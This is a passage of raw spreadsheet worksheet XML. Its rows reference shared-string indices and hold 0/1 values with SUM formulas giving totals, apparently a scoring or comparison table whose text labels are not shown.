        <v>1459</v>
      </c>
      <c r="D49" s="19">
        <v>1</v>
      </c>
      <c r="E49" s="19">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1439</v>
      </c>
      <c r="G49" s="19">
        <v>1</v>
      </c>
      <c r="H49" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>1431</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D50">
        <v>1</v>
      </c>
      <c r="E50">
        <v>1</v>
      </c>
      <c r="G50">
        <v>1</v>
      </c>
      <c r="H50">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A51" s="3"/>
      <c r="B51" s="3" t="s">
        <v>69</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>69</v>
      </c>
      <c r="D51" s="19">
        <v>1</v>
      </c>
      <c r="E51" s="19">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>69</v>
      </c>
      <c r="G51" s="19">
        <v>1</v>
      </c>
      <c r="H51" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>1432</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="D52">
        <v>1</v>
      </c>
      <c r="E52">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="G52">
        <v>1</v>
      </c>
      <c r="H52">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A53" s="3"/>
      <c r="B53" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="D53" s="19">
        <v>1</v>
      </c>
      <c r="E53" s="19">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="G53" s="19">
        <v>1</v>
      </c>
      <c r="H53" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A54" s="3"/>
      <c r="B54" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C54" s="3"/>
      <c r="D54" s="19">
        <v>0</v>
      </c>
      <c r="E54" s="19">
        <v>0</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="G54" s="19">
        <v>1</v>
      </c>
      <c r="H54" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" ht="234.6" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1433</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1461</v>
      </c>
      <c r="C55" s="9" t="s">
        <v>1462</v>
      </c>
      <c r="D55">
        <v>0</v>
      </c>
      <c r="E55">
        <v>0</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>1463</v>
      </c>
      <c r="G55">
        <v>0</v>
      </c>
      <c r="H55">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A56" s="6" t="s">
        <v>41</v>
      </c>
      <c r="D56" s="6">
        <f>SUM(D27:D55)</f>
        <v>26</v>
      </c>
      <c r="E56" s="6">
        <f t="shared" ref="E56:H56" si="1">SUM(E27:E55)</f>
        <v>24</v>
      </c>
      <c r="F56" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G56" s="6">
        <f t="shared" si="1"/>
        <v>28</v>
      </c>
      <c r="H56" s="6">
        <f t="shared" si="1"/>
        <v>25</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A25:H2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5D5E6-A4BE-4C63-9144-EF5278FEF621}">
  <dimension ref="A1:H64"/>
  <sheetViews>
    <sheetView topLeftCell="A55" workbookViewId="0">
      <selection activeCell="D22" sqref="D22"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.5546875" customWidth="1"/>
    <col min="2" max="3" width="26.6640625" customWidth="1"/>
    <col min="4" max="4" width="10.21875" customWidth="1"/>
    <col min="5" max="5" width="10.109375" customWidth="1"/>
    <col min="6" max="6" width="26.5546875" customWidth="1"/>
    <col min="7" max="7" width="10.44140625" customWidth="1"/>
    <col min="8" max="8" width="10.21875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>369</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ht="82.8" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>370</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>371</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>372</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>372</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>372</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>361</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>331</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>331</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>331</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>373</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>108</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>108</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>108</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>374</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>375</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>375</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>375</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>376</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>377</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>1909</v>
      </c>
      <c r="D9">
        <v>0</v>
      </c>
      <c r="E9">
        <v>0</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>1912</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>378</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>379</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>1909</v>
      </c>
      <c r="D10">
        <v>0</v>
      </c>
      <c r="E10">
        <v>0</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>383</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>380</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>381</v>
      </c>
      <c r="C11" s="9" t="s">
        <v>1910</v>
      </c>
      <c r="D11">
        <v>0</v>
      </c>
      <c r="E11">
        <v>0</v>
      </c>
      <c r="F11" s="9" t="s">
        <v>1911</v>
      </c>
      <c r="G11">
        <v>0</v>
      </c>
      <c r="H11">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>382</v>
      </c>
      <c r="B12" s="3"/>
      <c r="C12" s="3"/>
      <c r="F12" s="3"/>
    </row>
    <row r="13" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A13" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D13" s="6">
        <f>SUM(D4:D11)</f>
        <v>5</v>
      </c>
      <c r="E13" s="6">
        <f t="shared" ref="E13:H13" si="0">SUM(E4:E11)</f>
        <v>5</v>
      </c>
      <c r="F13" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G13" s="6">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="H13" s="6">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A16" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B16" s="25"/>
      <c r="C16" s="25"/>
      <c r="D16" s="25"/>
      <c r="E16" s="25"/>
      <c r="F16" s="25"/>
      <c r="G16" s="25"/>
      <c r="H16" s="25"/>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A17" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D17" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E17" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G17" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H17" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="18" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D18" s="20">
        <v>1</v>
      </c>
      <c r="E18" s="20">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D19" s="20">
        <v>1</v>
      </c>
      <c r="E19" s="20">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A20" s="3"/>
      <c r="B20" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>59</v>
      </c>
      <c r="D20" s="20">
        <v>1</v>
      </c>
      <c r="E20" s="20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>59</v>
      </c>
      <c r="G20" s="19">
        <v>1</v>
      </c>
      <c r="H20" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>1342</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="D21" s="20">
        <v>1</v>
      </c>
      <c r="E21" s="20">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A22" s="3"/>
      <c r="B22" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>1519</v>
      </c>
      <c r="D22" s="20">
        <v>1</v>
      </c>
      <c r="E22" s="20">
        <v>0</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>1519</v>
      </c>
      <c r="G22" s="19">
        <v>1</v>
      </c>
      <c r="H22" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A23" s="3"/>
      <c r="B23" s="3" t="s">
        <v>1518</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>1520</v>
      </c>
      <c r="D23" s="20">
        <v>1</v>
      </c>
      <c r="E23" s="20">
        <v>0</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>1520</v>
      </c>
      <c r="G23" s="19">
        <v>1</v>
      </c>
      <c r="H23" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>1464</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>1242</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>1521</v>
      </c>
      <c r="D24" s="20">
        <v>1</v>
      </c>
      <c r="E24" s="20">
        <v>0</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>1521</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A25" s="3"/>
      <c r="B25" s="3" t="s">
        <v>1189</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>1523</v>
      </c>
      <c r="D25" s="20">
        <v>1</v>
      </c>
      <c r="E25" s="20">
        <v>0</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>1523</v>
      </c>
      <c r="G25" s="19">
        <v>1</v>
      </c>
      <c r="H25" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>1465</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>1522</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="D26" s="20">
        <v>1</v>
      </c>
      <c r="E26" s="20">
        <v>0</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A27" s="3"/>
      <c r="B27" s="3" t="s">
        <v>1525</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>1913</v>
      </c>
      <c r="D27" s="20">
        <v>0</v>
      </c>
      <c r="E27" s="20">
        <v>0</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>1913</v>
      </c>
      <c r="G27" s="19">
        <v>0</v>
      </c>
      <c r="H27" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A28" s="3"/>
      <c r="B28" s="3" t="s">
        <v>1526</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>1528</v>
      </c>
      <c r="D28" s="20">
        <v>1</v>
      </c>
      <c r="E28" s="20">
        <v>0</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1528</v>
      </c>
      <c r="G28" s="19">
        <v>1</v>
      </c>
      <c r="H28" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>1466</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>1527</v>
      </c>
      <c r="C29" s="3"/>
      <c r="D29" s="20">
        <v>0</v>
      </c>
      <c r="E29" s="20">
        <v>0</v>
      </c>
      <c r="F29" s="3"/>
      <c r="G29">
        <v>0</v>
      </c>
      <c r="H29">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A30" s="3"/>
      <c r="B30" s="3" t="s">
        <v>1529</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>1531</v>
      </c>
      <c r="D30" s="20">
        <v>1</v>
      </c>
      <c r="E30" s="20">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>1531</v>
      </c>
      <c r="G30" s="19">
        <v>1</v>
      </c>
      <c r="H30" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>1467</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>1530</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>1532</v>
      </c>
      <c r="D31" s="20">
        <v>1</v>
      </c>
      <c r="E31" s="20">
        <v>0</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>1532</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A32" s="3"/>
      <c r="B32" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D32" s="20">
        <v>1</v>
      </c>
      <c r="E32" s="20">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G32" s="19">
        <v>1</v>
      </c>
      <c r="H32" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>1468</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>1205</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1205</v>
      </c>
      <c r="D33" s="20">
        <v>1</v>
      </c>
      <c r="E33" s="20">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1205</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>1469</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>1470</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1471</v>
      </c>
      <c r="D34" s="20">
        <v>1</v>
      </c>
      <c r="E34" s="20">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1471</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>1472</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1473</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1509</v>
      </c>
      <c r="D35" s="20">
        <v>1</v>
      </c>
      <c r="E35" s="20">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1509</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>1474</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1475</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1510</v>
      </c>
      <c r="D36" s="20">
        <v>1</v>
      </c>
      <c r="E36" s="20">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1510</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1476</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1477</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1477</v>
      </c>
      <c r="D37" s="20">
        <v>1</v>
      </c>
      <c r="E37" s="20">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1477</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>1478</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>68</v>
      </c>
      <c r="D38" s="20">
        <v>1</v>
      </c>
      <c r="E38" s="20">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>68</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>1479</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>71</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>71</v>
      </c>
      <c r="D39" s="20">
        <v>1</v>
      </c>
      <c r="E39" s="20">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>71</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>1480</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1481</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1482</v>
      </c>
      <c r="D40" s="20">
        <v>1</v>
      </c>
      <c r="E40" s="20">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1482</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>1483</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1484</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1511</v>
      </c>
      <c r="D41" s="20">
        <v>1</v>
      </c>
      <c r="E41" s="20">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1511</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1485</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1486</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1512</v>
      </c>
      <c r="D42" s="20">
        <v>1</v>
      </c>
      <c r="E42" s="20">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1512</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A43" s="3"/>
      <c r="B43" s="3" t="s">
        <v>1534</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1535</v>
      </c>
      <c r="D43" s="20">
        <v>1</v>
      </c>
      <c r="E43" s="20">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1535</v>
      </c>
      <c r="G43" s="19">
        <v>1</v>
      </c>
      <c r="H43" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>1487</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1533</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1533</v>
      </c>
      <c r="D44" s="20">
        <v>1</v>
      </c>
      <c r="E44" s="20">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1533</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>1488</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1489</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1490</v>
      </c>
      <c r="D45" s="20">
        <v>1</v>
      </c>
      <c r="E45" s="20">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1490</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>1485</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1486</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1512</v>
      </c>
      <c r="D46" s="20">
        <v>1</v>
      </c>
      <c r="E46" s="20">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1512</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>1491</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>1492</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1513</v>
      </c>
      <c r="D47" s="20">
        <v>1</v>
      </c>
      <c r="E47" s="20">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1513</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A48" s="3"/>
      <c r="B48" s="3" t="s">
        <v>1529</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>1531</v>
      </c>
      <c r="D48" s="20">
        <v>1</v>
      </c>
      <c r="E48" s="20">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1531</v>
      </c>
      <c r="G48" s="19">
        <v>1</v>
      </c>
      <c r="H48" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>1493</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>1536</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1536</v>
      </c>
      <c r="D49" s="20">
        <v>1</v>
      </c>
      <c r="E49" s="20">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1536</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>1494</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1495</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1496</v>
      </c>
      <c r="D50" s="20">
        <v>1</v>
      </c>
      <c r="E50" s="20">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1496</v>
      </c>
      <c r="G50">
        <v>1</v>
      </c>
      <c r="H50">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>1497</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>1498</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1514</v>
      </c>
      <c r="D51" s="20">
        <v>1</v>
      </c>
      <c r="E51" s="20">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1514</v>
      </c>
      <c r="G51">
        <v>1</v>
      </c>
      <c r="H51">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A52" s="3"/>
      <c r="B52" s="3" t="s">
        <v>1538</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>1538</v>
      </c>
      <c r="D52" s="20">
        <v>1</v>
      </c>
      <c r="E52" s="20">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1538</v>
      </c>
      <c r="G52" s="19">
        <v>1</v>
      </c>
      <c r="H52" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>1499</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>1537</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1537</v>
      </c>
      <c r="D53" s="20">
        <v>1</v>
      </c>
      <c r="E53" s="20">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1537</v>
      </c>
      <c r="G53">
        <v>1</v>
      </c>
      <c r="H53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1500</v>
